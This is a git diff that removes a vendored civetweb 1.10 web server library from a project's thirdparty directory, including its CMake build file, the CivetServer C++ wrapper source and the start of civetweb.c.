--- a/thirdparty/civetweb-1.10/src/CMakeLists.txt
+++ /dev/null
@@ -1,306 +0,0 @@
-# The C API library
-add_library(c-library civetweb.c)
-set_target_properties(c-library PROPERTIES
-  OUTPUT_NAME "civetweb"
-  VERSION ${CIVETWEB_VERSION}
-  SOVERSION ${CIVETWEB_VERSION}
-)
-
-set_property(TARGET c-library PROPERTY POSITION_INDEPENDENT_CODE ON)
-
-if (BUILD_SHARED_LIBS)
-if (APPLE)
-  target_compile_definitions(c-library PRIVATE CIVETWEB_DLL_EXPORTS)
- endif()
-endif()
-target_include_directories(
-  c-library PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-install(
-  TARGETS c-library
-  ARCHIVE DESTINATION lib
-  LIBRARY DESTINATION lib
-  RUNTIME DESTINATION bin
-  COMPONENT c-library)
-install(FILES
-  ${PROJECT_SOURCE_DIR}/include/civetweb.h
-  DESTINATION include
-  COMPONENT c-library)
-
-# Need Windows sockets if available
-find_package(WinSock)
-if (WINSOCK_FOUND)
-  target_link_libraries(c-library WINSOCK::WINSOCK)
-endif()
-
-# We need threading
-find_package(Threads)
-target_link_libraries(c-library ${CMAKE_THREAD_LIBS_INIT})
-
-# Need the realtime library if we're using timers
-find_package(LibRt)
-if (CIVETWEB_ENABLE_WEBSOCKETS AND CIVETWEB_ENABLE_LUA AND LIBRT_FOUND)
-  target_link_libraries(c-library LIBRT::LIBRT)
-endif()
-
-# We need to link OpenSSL if not dynamically loading
-if (CIVETWEB_ENABLE_SSL)
-  if (CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING)
-    find_package(LibDl)
-    if (LIBDL_FOUND)
-      target_link_libraries(c-library -ldl)
-    endif()
-  else()
-    find_package(OpenSSL)
-    include_directories(${OPENSSL_INCLUDE_DIR})
-    message(STATUS "OpenSSL include directory: ${OPENSSL_INCLUDE_DIR}")
-    target_link_libraries(c-library ${OPENSSL_LIBRARIES})
-  endif()
-endif()
-
-# If Lua support is needed we build some extra Lua libraries
-if (CIVETWEB_ENABLE_LUA)
-  include(ExternalProject)
-
-  # Determine if we should print to the output
-  if (CIVETWEB_ENABLE_THIRD_PARTY_OUTPUT)
-    set(THIRD_PARTY_LOGGING 0)
-  else()
-    set(THIRD_PARTY_LOGGING 1)
-  endif()
-
-  # If Lua is static we must build it from source
-  if (NOT CIVETWEB_ENABLE_LUA_SHARED)
-    if (LINUX)
-      set(LUA_MAKE_TARGET linux)
-    elseif(DARWIN)
-      set(LUA_MAKE_TARGET macosx)
-    elseif(FREEBSD)
-      set(LUA_MAKE_TARGET freebsd)
-    elseif(WINDOWS)
-      set(LUA_MAKE_TARGET mingw)
-    elseif(UNIX)
-      set(LUA_MAKE_TARGET posix)
-    else()
-      set(LUA_MAKE_TARGET generic)
-    endif()
-    set(LUA_BUILD_COMMAND "${CMAKE_MAKE_PROGRAM};${LUA_MAKE_TARGET}")
-    if (BUILD_SHARED_LIBS)
-      set(LUA_BUILD_COMMAND "${LUA_BUILD_COMMAND};MYCFLAGS=-fPIC")
-    endif()
-    ExternalProject_Add(lua
-      URL "http://www.lua.org/ftp/lua-${CIVETWEB_LUA_VERSION}.tar.gz"
-      URL_MD5 ${CIVETWEB_LUA_MD5_HASH}
-      PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-      CONFIGURE_COMMAND ""
-      BUILD_COMMAND ${LUA_BUILD_COMMAND}
-      BUILD_IN_SOURCE 1
-      INSTALL_COMMAND make install "INSTALL_TOP=<INSTALL_DIR>"
-      LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-      LOG_UPDATE ${THIRD_PARTY_LOGGING}
-      LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-      LOG_BUILD ${THIRD_PARTY_LOGGING}
-      LOG_TEST ${THIRD_PARTY_LOGGING}
-      LOG_INSTALL ${THIRD_PARTY_LOGGING})
-    ExternalProject_Get_Property(lua INSTALL_DIR)
-    set(LUA_INSTALL_DIR ${INSTALL_DIR})
-    unset(INSTALL_DIR)
-    link_directories("${LUA_INSTALL_DIR}/lib")
-    include_directories("${LUA_INSTALL_DIR}/include")
-    set(LUA_LIBRARIES "${LUA_INSTALL_DIR}/lib/liblua.a")
-    add_dependencies(c-library lua)
-  else()
-    find_package(Lua)
-  endif()
-
-  # Lua Filesystem Support
-  string(REPLACE "." "_" LUA_FILESYSTEM_VERSION_UNDERSCORE ${CIVETWEB_LUA_FILESYSTEM_VERSION})
-  ExternalProject_Add(luafilesystem
-    URL "https://github.com/keplerproject/luafilesystem/archive/v_${LUA_FILESYSTEM_VERSION_UNDERSCORE}.tar.gz"
-    URL_MD5 ${CIVETWEB_LUA_FILESYSTEM_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/luafilesystem/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(luafilesystem INSTALL_DIR)
-  set(LUA_FILESYSTEM_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${LUA_FILESYSTEM_INSTALL_DIR}/lib")
-  include_directories("${LUA_FILESYSTEM_INSTALL_DIR}/include")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${LUA_FILESYSTEM_INSTALL_DIR}/lib/libluafilesystem.a")
-  add_dependencies(c-library luafilesystem)
-
-  # Lua SQLite Support
-  if (${CIVETWEB_LUA_SQLITE_VERSION} VERSION_EQUAL "0.9.3")
-    set(LUA_SQLITE_FILENAME lsqlite3_fsl09w.zip)
-  elseif (${CIVETWEB_LUA_SQLITE_VERSION} VERSION_EQUAL "0.9.2")
-    set(LUA_SQLITE_FILENAME lsqlite3_fsl09v.zip)
-  elseif (${CIVETWEB_LUA_SQLITE_VERSION} VERSION_EQUAL "0.9.1")
-    set(LUA_SQLITE_FILENAME lsqlite3_fsl09t.zip)
-  else()
-    message(FATAL_ERROR "The Lua SQLite archive filename is unknown for version ${CIVETWEB_LUA_SQLITE_VERSION}")
-  endif()
-  ExternalProject_Add(luasqlite
-    URL "http://lua.sqlite.org/index.cgi/zip/${LUA_SQLITE_FILENAME}"
-    URL_MD5 ${CIVETWEB_LUA_SQLITE_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/luasqlite/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(luasqlite INSTALL_DIR)
-  set(LUA_SQLITE_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${LUA_SQLITE_INSTALL_DIR}/lib")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${LUA_SQLITE_INSTALL_DIR}/lib/libluasqlite.a")
-  add_dependencies(c-library luasqlite)
-
-  # Lua XML Support
-  if (${CIVETWEB_LUA_XML_VERSION} VERSION_EQUAL "1.8.0")
-    set(LUA_XML_FILENAME LuaXML_130610.zip)
-  elseif (${CIVETWEB_LUA_XML_VERSION} VERSION_EQUAL "1.7.4")
-    set(LUA_XML_FILENAME LuaXML_101012.zip)
-  else()
-    message(FATAL_ERROR "The Lua XML archive filename is unknown for version ${CIVETWEB_LUA_XML_VERSION}")
-  endif()
-  ExternalProject_Add(luaxml
-    URL "http://viremo.eludi.net/LuaXML/${LUA_XML_FILENAME}"
-    URL_MD5 ${CIVETWEB_LUA_XML_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/luaxml/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(luaxml INSTALL_DIR)
-  set(LUA_XML_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${LUA_XML_INSTALL_DIR}/lib")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${LUA_XML_INSTALL_DIR}/lib/libluaxml.a")
-  add_dependencies(c-library luaxml)
-
-  # SQLite Support
-  string (REGEX MATCHALL "[0-9]+" SQLITE_VERSION_MATCHES ${CIVETWEB_SQLITE_VERSION})
-  list(GET SQLITE_VERSION_MATCHES 0 SQLITE_VERSION_MAJOR)
-  list(GET SQLITE_VERSION_MATCHES 1 SQLITE_VERSION_MINOR)
-  list(GET SQLITE_VERSION_MATCHES 2 SQLITE_VERSION_PATCH)
-  set(SQLITE_FILE_VERSION ${SQLITE_VERSION_MAJOR}0${SQLITE_VERSION_MINOR}0${SQLITE_VERSION_PATCH}00)
-  ExternalProject_Add(sqlite
-    URL "http://www.sqlite.org/2015/sqlite-amalgamation-${SQLITE_FILE_VERSION}.zip"
-    URL_MD5 ${CIVETWEB_SQLITE_MD5_HASH}
-    PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-    PATCH_COMMAND ${CMAKE_COMMAND} -E copy
-      "${CMAKE_CURRENT_SOURCE_DIR}/cmake/sqlite/CMakeLists.txt" <SOURCE_DIR>/CMakeLists.txt
-    CMAKE_ARGS
-      "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-      "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-    LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-    LOG_UPDATE ${THIRD_PARTY_LOGGING}
-    LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-    LOG_BUILD ${THIRD_PARTY_LOGGING}
-    LOG_TEST ${THIRD_PARTY_LOGGING}
-    LOG_INSTALL ${THIRD_PARTY_LOGGING})
-  ExternalProject_Get_Property(sqlite INSTALL_DIR)
-  set(SQLITE_INSTALL_DIR ${INSTALL_DIR})
-  unset(INSTALL_DIR)
-  link_directories("${SQLITE_INSTALL_DIR}/lib")
-  include_directories("${SQLITE_INSTALL_DIR}/include")
-  set(LUA_LIBRARIES "${LUA_LIBRARIES};${SQLITE_INSTALL_DIR}/lib/libsqlite.a")
-  add_dependencies(c-library sqlite)
-
-  # Link all the Lua libraries
-  target_link_libraries(c-library ${LUA_LIBRARIES})
-endif()
-
-# The web server executable
-add_executable(c-executable main.c)
-set_target_properties(c-executable PROPERTIES
-  OUTPUT_NAME "civetweb"
-)
-if (CIVETWEB_INSTALL_EXECUTABLE)
-  install(
-    TARGETS c-executable
-    ARCHIVE DESTINATION lib
-    LIBRARY DESTINATION lib
-    RUNTIME DESTINATION bin
-    COMPONENT server)
-endif()
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(c-executable PRIVATE CIVETWEB_DLL_IMPORTS)
-endif()
-target_include_directories(
-  c-executable PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(c-executable c-library)
-if (LIBRT_FOUND)
-  target_link_libraries(c-executable LIBRT::LIBRT)
-endif()
-
-if (CIVETWEB_ENABLE_LUA)
-  add_library(lua-library third_party/lfs.c third_party/lsqlite3.c third_party/LuaXML_lib.c third_party/sqlite3.c)
-  set_target_properties(lua-library PROPERTIES
-    OUTPUT_NAME "lua-library"
-    VERSION ${CIVETWEB_VERSION}
-    SOVERSION ${CIVETWEB_VERSION}
-  )
-  target_include_directories(
-    lua-library PUBLIC
-    ${PROJECT_SOURCE_DIR}/src/third_party/lua-5.2.4)
-  install(
-    TARGETS lua-library
-    ARCHIVE DESTINATION lib
-    LIBRARY DESTINATION lib
-    RUNTIME DESTINATION bin
-    COMPONENT lua-library)
-endif()
-
-# The C++ API library
-if (CIVETWEB_ENABLE_CXX)
-  add_library(civetweb-cpp CivetServer.cpp)
-  
-  set_property(TARGET civetweb-cpp PROPERTY POSITION_INDEPENDENT_CODE ON)
-  set_target_properties(civetweb-cpp PROPERTIES
-    OUTPUT_NAME "civetweb-cpp"
-    VERSION ${CIVETWEB_VERSION}
-    SOVERSION ${CIVETWEB_VERSION}
-  )
-  if (BUILD_SHARED_LIBS)
-if (APPLE)
-  target_compile_definitions(civetweb-cpp PRIVATE CIVETWEB_DLL_EXPORTS)
- endif()
- endif()
-  target_include_directories(
-    civetweb-cpp PUBLIC
-    ${PROJECT_SOURCE_DIR}/include)
-  install(
-    TARGETS civetweb-cpp
-    ARCHIVE DESTINATION lib
-    LIBRARY DESTINATION lib
-    RUNTIME DESTINATION bin
-    COMPONENT civetweb-cpp)
-  install(FILES
-    ${PROJECT_SOURCE_DIR}/include/CivetServer.h
-    DESTINATION include
-    COMPONENT civetweb-cpp)
-endif()
diff --git a/thirdparty/civetweb-1.10/src/CivetServer.cpp b/thirdparty/civetweb-1.10/src/CivetServer.cpp
deleted file mode 100644
index 186f18b..0000000
--- a/thirdparty/civetweb-1.10/src/CivetServer.cpp
+++ /dev/null
@@ -1,609 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2013 No Face Press, LLC
- *
- * License http://opensource.org/licenses/mit-license.php MIT License
- */
-
-#include "CivetServer.h"
-
-#include <stdlib.h>
-#include <string.h>
-#include <assert.h>
-#include <stdexcept>
-
-#ifndef UNUSED_PARAMETER
-#define UNUSED_PARAMETER(x) (void)(x)
-#endif
-
-bool
-CivetHandler::handleGet(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handlePost(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handleHead(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handlePut(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handlePatch(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handleDelete(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetHandler::handleOptions(CivetServer *server, struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return false;
-}
-
-bool
-CivetWebSocketHandler::handleConnection(CivetServer *server,
-                                        const struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return true;
-}
-
-void
-CivetWebSocketHandler::handleReadyState(CivetServer *server,
-                                        struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return;
-}
-
-bool
-CivetWebSocketHandler::handleData(CivetServer *server,
-                                  struct mg_connection *conn,
-                                  int bits,
-                                  char *data,
-                                  size_t data_len)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	UNUSED_PARAMETER(bits);
-	UNUSED_PARAMETER(data);
-	UNUSED_PARAMETER(data_len);
-	return true;
-}
-
-void
-CivetWebSocketHandler::handleClose(CivetServer *server,
-                                   const struct mg_connection *conn)
-{
-	UNUSED_PARAMETER(server);
-	UNUSED_PARAMETER(conn);
-	return;
-}
-
-int
-CivetServer::requestHandler(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	mg_lock_context(me->context);
-	me->connections[conn] = CivetConnection();
-	mg_unlock_context(me->context);
-
-	CivetHandler *handler = (CivetHandler *)cbdata;
-
-	if (handler) {
-		if (strcmp(request_info->request_method, "GET") == 0) {
-			return handler->handleGet(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "POST") == 0) {
-			return handler->handlePost(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "HEAD") == 0) {
-			return handler->handleHead(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "PUT") == 0) {
-			return handler->handlePut(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "DELETE") == 0) {
-			return handler->handleDelete(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "OPTIONS") == 0) {
-			return handler->handleOptions(me, conn) ? 1 : 0;
-		} else if (strcmp(request_info->request_method, "PATCH") == 0) {
-			return handler->handlePatch(me, conn) ? 1 : 0;
-		}
-	}
-
-	return 0; // No handler found
-}
-
-int
-CivetServer::authHandler(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	mg_lock_context(me->context);
-	me->connections[conn] = CivetConnection();
-	mg_unlock_context(me->context);
-
-	CivetAuthHandler *handler = (CivetAuthHandler *)cbdata;
-
-	if (handler) {
-		return handler->authorize(me, conn) ? 1 : 0;
-	}
-
-	return 0; // No handler found
-}
-
-int
-CivetServer::webSocketConnectionHandler(const struct mg_connection *conn,
-                                        void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		return handler->handleConnection(me, conn) ? 0 : 1;
-	}
-
-	return 1; // No handler found, close connection
-}
-
-void
-CivetServer::webSocketReadyHandler(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		handler->handleReadyState(me, conn);
-	}
-}
-
-int
-CivetServer::webSocketDataHandler(struct mg_connection *conn,
-                                  int bits,
-                                  char *data,
-                                  size_t data_len,
-                                  void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return 0;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		return handler->handleData(me, conn, bits, data, data_len) ? 1 : 0;
-	}
-
-	return 1; // No handler found
-}
-
-void
-CivetServer::webSocketCloseHandler(const struct mg_connection *conn,
-                                   void *cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	assert(request_info != NULL);
-	CivetServer *me = (CivetServer *)(request_info->user_data);
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return;
-
-	CivetWebSocketHandler *handler = (CivetWebSocketHandler *)cbdata;
-
-	if (handler) {
-		handler->handleClose(me, conn);
-	}
-}
-
-CivetCallbacks::CivetCallbacks()
-{
-	memset(this, 0, sizeof(*this));
-}
-
-CivetServer::CivetServer(const char **options,
-                         const struct CivetCallbacks *_callbacks,
-                         const void *UserContextIn)
-    : context(0)
-{
-	struct CivetCallbacks callbacks;
-
-	UserContext = UserContextIn;
-
-	if (_callbacks) {
-		callbacks = *_callbacks;
-		userCloseHandler = _callbacks->connection_close;
-	} else {
-		userCloseHandler = NULL;
-	}
-	callbacks.connection_close = closeHandler;
-	context = mg_start(&callbacks, this, options);
-	if (context == NULL)
-		throw CivetException("null context when constructing CivetServer. "
-		                     "Possible problem binding to port.");
-}
-
-CivetServer::CivetServer(std::vector<std::string> options,
-                         const struct CivetCallbacks *_callbacks,
-                         const void *UserContextIn)
-    : context(0)
-{
-	struct CivetCallbacks callbacks;
-
-	UserContext = UserContextIn;
-
-	if (_callbacks) {
-		callbacks = *_callbacks;
-		userCloseHandler = _callbacks->connection_close;
-	} else {
-		userCloseHandler = NULL;
-	}
-	callbacks.connection_close = closeHandler;
-
-	std::vector<const char *> pointers(options.size());
-	for (size_t i = 0; i < options.size(); i++) {
-		pointers[i] = (options[i].c_str());
-	}
-	pointers.push_back(0);
-
-	context = mg_start(&callbacks, this, &pointers[0]);
-	if (context == NULL)
-		throw CivetException("null context when constructing CivetServer. "
-		                     "Possible problem binding to port.");
-}
-
-CivetServer::~CivetServer()
-{
-	close();
-}
-
-void
-CivetServer::closeHandler(const struct mg_connection *conn)
-{
-	CivetServer *me = (CivetServer *)mg_get_user_data(mg_get_context(conn));
-	assert(me != NULL);
-
-	// Happens when a request hits the server before the context is saved
-	if (me->context == NULL)
-		return;
-
-	if (me->userCloseHandler) {
-		me->userCloseHandler(conn);
-	}
-	mg_lock_context(me->context);
-	me->connections.erase(const_cast<struct mg_connection *>(conn));
-	mg_unlock_context(me->context);
-}
-
-void
-CivetServer::addHandler(const std::string &uri, CivetHandler *handler)
-{
-	mg_set_request_handler(context, uri.c_str(), requestHandler, handler);
-}
-
-void
-CivetServer::addWebSocketHandler(const std::string &uri,
-                                 CivetWebSocketHandler *handler)
-{
-	mg_set_websocket_handler(context,
-	                         uri.c_str(),
-	                         webSocketConnectionHandler,
-	                         webSocketReadyHandler,
-	                         webSocketDataHandler,
-	                         webSocketCloseHandler,
-	                         handler);
-}
-
-void
-CivetServer::addAuthHandler(const std::string &uri, CivetAuthHandler *handler)
-{
-	mg_set_auth_handler(context, uri.c_str(), authHandler, handler);
-}
-
-void
-CivetServer::removeHandler(const std::string &uri)
-{
-	mg_set_request_handler(context, uri.c_str(), NULL, NULL);
-}
-
-void
-CivetServer::removeWebSocketHandler(const std::string &uri)
-{
-	mg_set_websocket_handler(
-	    context, uri.c_str(), NULL, NULL, NULL, NULL, NULL);
-}
-
-void
-CivetServer::removeAuthHandler(const std::string &uri)
-{
-	mg_set_auth_handler(context, uri.c_str(), NULL, NULL);
-}
-
-void
-CivetServer::close()
-{
-	if (context) {
-		mg_stop(context);
-		context = 0;
-	}
-}
-
-int
-CivetServer::getCookie(struct mg_connection *conn,
-                       const std::string &cookieName,
-                       std::string &cookieValue)
-{
-	// Maximum cookie length as per microsoft is 4096.
-	// http://msdn.microsoft.com/en-us/library/ms178194.aspx
-	char _cookieValue[4096];
-	const char *cookie = mg_get_header(conn, "Cookie");
-	int lRead = mg_get_cookie(cookie,
-	                          cookieName.c_str(),
-	                          _cookieValue,
-	                          sizeof(_cookieValue));
-	cookieValue.clear();
-	cookieValue.append(_cookieValue);
-	return lRead;
-}
-
-const char *
-CivetServer::getHeader(struct mg_connection *conn,
-                       const std::string &headerName)
-{
-	return mg_get_header(conn, headerName.c_str());
-}
-
-void
-CivetServer::urlDecode(const char *src,
-                       std::string &dst,
-                       bool is_form_url_encoded)
-{
-	urlDecode(src, strlen(src), dst, is_form_url_encoded);
-}
-
-void
-CivetServer::urlDecode(const char *src,
-                       size_t src_len,
-                       std::string &dst,
-                       bool is_form_url_encoded)
-{
-	int i, j, a, b;
-#define HEXTOI(x) (isdigit(x) ? x - '0' : x - 'W')
-
-	dst.clear();
-	for (i = j = 0; i < (int)src_len; i++, j++) {
-		if (i < (int)src_len - 2 && src[i] == '%'
-		    && isxdigit(*(const unsigned char *)(src + i + 1))
-		    && isxdigit(*(const unsigned char *)(src + i + 2))) {
-			a = tolower(*(const unsigned char *)(src + i + 1));
-			b = tolower(*(const unsigned char *)(src + i + 2));
-			dst.push_back((char)((HEXTOI(a) << 4) | HEXTOI(b)));
-			i += 2;
-		} else if (is_form_url_encoded && src[i] == '+') {
-			dst.push_back(' ');
-		} else {
-			dst.push_back(src[i]);
-		}
-	}
-}
-
-bool
-CivetServer::getParam(struct mg_connection *conn,
-                      const char *name,
-                      std::string &dst,
-                      size_t occurrence)
-{
-	const char *formParams = NULL;
-	const struct mg_request_info *ri = mg_get_request_info(conn);
-	assert(ri != NULL);
-	CivetServer *me = (CivetServer *)(ri->user_data);
-	assert(me != NULL);
-	mg_lock_context(me->context);
-	CivetConnection &conobj = me->connections[conn];
-	mg_lock_connection(conn);
-	mg_unlock_context(me->context);
-
-	if (conobj.postData != NULL) {
-		formParams = conobj.postData;
-	} else {
-		const char *con_len_str = mg_get_header(conn, "Content-Length");
-		if (con_len_str) {
-			unsigned long con_len = atoi(con_len_str);
-			if (con_len > 0) {
-				// Add one extra character: in case the post-data is a text, it
-				// is required as 0-termination.
-				// Do not increment con_len, since the 0 terminating is not part
-				// of the content (text or binary).
-				conobj.postData = (char *)malloc(con_len + 1);
-				if (conobj.postData != NULL) {
-					// malloc may fail for huge requests
-					mg_read(conn, conobj.postData, con_len);
-					conobj.postData[con_len] = 0;
-					formParams = conobj.postData;
-					conobj.postDataLen = con_len;
-				}
-			}
-		}
-	}
-	if (formParams == NULL) {
-		// get requests do store html <form> field values in the http
-		// query_string
-		formParams = ri->query_string;
-	}
-	mg_unlock_connection(conn);
-
-	if (formParams != NULL) {
-		return getParam(formParams, strlen(formParams), name, dst, occurrence);
-	}
-
-	return false;
-}
-
-bool
-CivetServer::getParam(const char *data,
-                      size_t data_len,
-                      const char *name,
-                      std::string &dst,
-                      size_t occurrence)
-{
-	const char *p, *e, *s;
-	size_t name_len;
-
-	dst.clear();
-	if (data == NULL || name == NULL || data_len == 0) {
-		return false;
-	}
-	name_len = strlen(name);
-	e = data + data_len;
-
-	// data is "var1=val1&var2=val2...". Find variable first
-	for (p = data; p + name_len < e; p++) {
-		if ((p == data || p[-1] == '&') && p[name_len] == '='
-		    && !mg_strncasecmp(name, p, name_len) && 0 == occurrence--) {
-
-			// Point p to variable value
-			p += name_len + 1;
-
-			// Point s to the end of the value
-			s = (const char *)memchr(p, '&', (size_t)(e - p));
-			if (s == NULL) {
-				s = e;
-			}
-			assert(s >= p);
-
-			// Decode variable into destination buffer
-			urlDecode(p, (int)(s - p), dst, true);
-			return true;
-		}
-	}
-	return false;
-}
-
-void
-CivetServer::urlEncode(const char *src, std::string &dst, bool append)
-{
-	urlEncode(src, strlen(src), dst, append);
-}
-
-void
-CivetServer::urlEncode(const char *src,
-                       size_t src_len,
-                       std::string &dst,
-                       bool append)
-{
-	static const char *dont_escape = "._-$,;~()";
-	static const char *hex = "0123456789abcdef";
-
-	if (!append)
-		dst.clear();
-
-	for (; src_len > 0; src++, src_len--) {
-		if (isalnum(*(const unsigned char *)src)
-		    || strchr(dont_escape, *(const unsigned char *)src) != NULL) {
-			dst.push_back(*src);
-		} else {
-			dst.push_back('%');
-			dst.push_back(hex[(*(const unsigned char *)src) >> 4]);
-			dst.push_back(hex[(*(const unsigned char *)src) & 0xf]);
-		}
-	}
-}
-
-std::vector<int>
-CivetServer::getListeningPorts()
-{
-	std::vector<int> ports(50);
-	std::vector<struct mg_server_ports> server_ports(50);
-	int size = mg_get_server_ports(context,
-	                               (int)server_ports.size(),
-	                               &server_ports[0]);
-	if (size <= 0) {
-		ports.resize(0);
-		return ports;
-	}
-	ports.resize(size);
-	server_ports.resize(size);
-	for (int i = 0; i < size; i++) {
-		ports[i] = server_ports[i].port;
-	}
-
-	return ports;
-}
-
-CivetServer::CivetConnection::CivetConnection()
-{
-	postData = NULL;
-	postDataLen = 0;
-}
-
-CivetServer::CivetConnection::~CivetConnection()
-{
-	free(postData);
-}
diff --git a/thirdparty/civetweb-1.10/src/civetweb.c b/thirdparty/civetweb-1.10/src/civetweb.c
deleted file mode 100644
index 95945d3..0000000
--- a/thirdparty/civetweb-1.10/src/civetweb.c
+++ /dev/null
@@ -1,18067 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
